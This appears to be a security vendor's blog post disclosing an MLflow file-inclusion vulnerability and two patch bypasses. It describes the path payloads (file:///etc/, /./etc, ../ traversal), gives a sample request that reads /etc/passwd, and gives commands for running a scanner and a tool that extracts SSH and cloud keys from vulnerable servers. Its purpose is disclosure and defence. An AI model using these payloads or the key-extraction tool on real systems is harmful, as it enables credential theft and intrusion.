- 2 patch bypasses found for severe MLflow LFI/RFI vulnerability
- All patched in MLflow version 2.2.3
- Protect AI’s vulnerability scanning and exploit tools updated with bypasses
Recap
Previously, here at Protect AI, researchers found a system takeover vulnerability in the form of a Local and Remote File Include vulnerability in the popular machine learning tool MLflow which has 13 million downloads a month. This allows an attacker to gain remote access to the SSH keys of the engineers on the server, potentially cloud credentials, along with all the ML models and data stored on the server or adjacent servers that share SSH authentication keys. Community maintainers quickly responded and patched the vulnerability within days. After we highlighted the vulnerable nature of that specific area of the codebase, other curious minds began looking there as well.
Shining a Spotlight on AI Security
As AI becomes more integrated into our daily life, the security of the AI also becomes more important. At the time of the original vulnerability post it had 867 publicly available servers. Today, that number is past 1,000; an increase of 25% in only a couple months!
In line with our goal of securing the AI lifecycle, we created a public service bug bounty program in open source AI tools hosted on huntr.dev. On March 27th, user @iamnooob reported a bypass to the original patch. Then, 23 days later, a second bypass was privately submitted to the MLflow community maintainers.
March 23rd, 2023 - Original vulnerability
Original vulnerability due to MLflow allowing a user to specify a local or remote path to a version of a model and using that to grab arbitrary local files reported by Protect AI went public. An attacker could payload the source parameters of the model version with a local or remote file path. Then when they called get-artifact on the model version, they could specify a file in the payloaded path. Setting source to file:///etc/ then requesting an artifact filename of passwd would dump the local or remote server’s /etc/passwd file. The MLflow team patched it in this commit.
March 27th, 2023 - Patch Bypass #1
Huntr.dev user @iamnoooob found that while the patch prevented setting the model version source to a filepath like /etc it didn’t prevent filepaths like /./etc. Command shells interpret single periods as a reference to the current working directory. MLflow was originally looking for filepaths that started with /, the root directory, to identify paths that were to arbitrary local folders. It was not, however, expecting to see a dot. This means the local filepath check was being bypassed and the following / was interpreted as the root folder directory leading to access to the entire filesystem.
Bypass:
This allows the user to make a GET and download an arbitrary file from the server with a payloaded path parameter such as: GET /model-versions/get-artifact?path=passwd&name=mlflow2.2.2&version=2
The MLflow team again quickly responded to the report and patched the issue.
April 20th, 2023 - Patch Bypass #2
Recently another bypass was found by GitHub user @pakesson-truesec and reported privately on the MLflow GitHub Issues page. We’ll take a different approach in identifying what the vulnerability was by analyzing the patch which can be seen below.
Based on the patch, remote artifact stores are vulnerable to LFI payloads appended to the end of the path in model version source API calls such as ../../../../<target_folder>. The previous vulnerabilities attacked the local MLflow server filesystem as well as remote file servers that MLflow connected to for saving artifacts. This bypass attacks only the remote file server and allows the attacker to access arbitrary files from the remote artifact store server.
Lessons on Secure Coding
We confirmed that version 2.2.3 protects against these publicly known exploits. An example response after attempting to use the first bypass fails in version 2.2.3 as can be seen below.
The AI industry is still in its nascent phase which means much of the fundamental code that AI runs on or in is maintained by small numbers of volunteers. Writing secure code is difficult but we commend the maintainer communities that prioritize their user’s safety with prompt responses and fixes when security issues arise, such as the MLflow team. We are leading the way in finding these security issues and reporting them before they’re discovered by malicious actors.
Security Toolsuite
We have updated our suite of MLflow security tools which take advantage of these vulnerabilities including a remote scanner to determine if an MLflow server is vulnerable.
https://github.com/protectai/Snaike-MLflow
Check if an MLflow server is vulnerable:
git clone https://github.com/protectai/Snaike-MLflow
cd Snaike-MLflow/CVE-2023-1177-scanner
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
python CVE-2023-1177-scanner.py -s http://1.2.3.4:5000
Find SSH and cloud account keys in vulnerable MLflow servers:
git clone https://github.com/protectai/Snaike-MLflow
cd Snaike-MLflow/MLFIflow
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
python MLFIflow.py -s http://1.2.3.4:5000
Conclusion
The MLflow maintainers are excellent at quickly addressing security issues and have fixed them all promptly. The original exploit and bypasses are all patched in the current version of MLflow: 2.3.0. When dealing with open source security we recommend to all developers to create their applications with a zero trust framework in mind; users should start with minimal privileges and be explicitly given privileges they require with special care given to the processing of user input where applicable. The continued safety of open source tools depends not only on the developers, however. Organizations and users of open source tools should also bear some responsibility in the continued safety of these useful, free products by contributing code and testing to the open source projects. If you would like to participate in our goal of securing the AI industry visit huntr.dev and get paid to help increase the security of AI libraries and tools.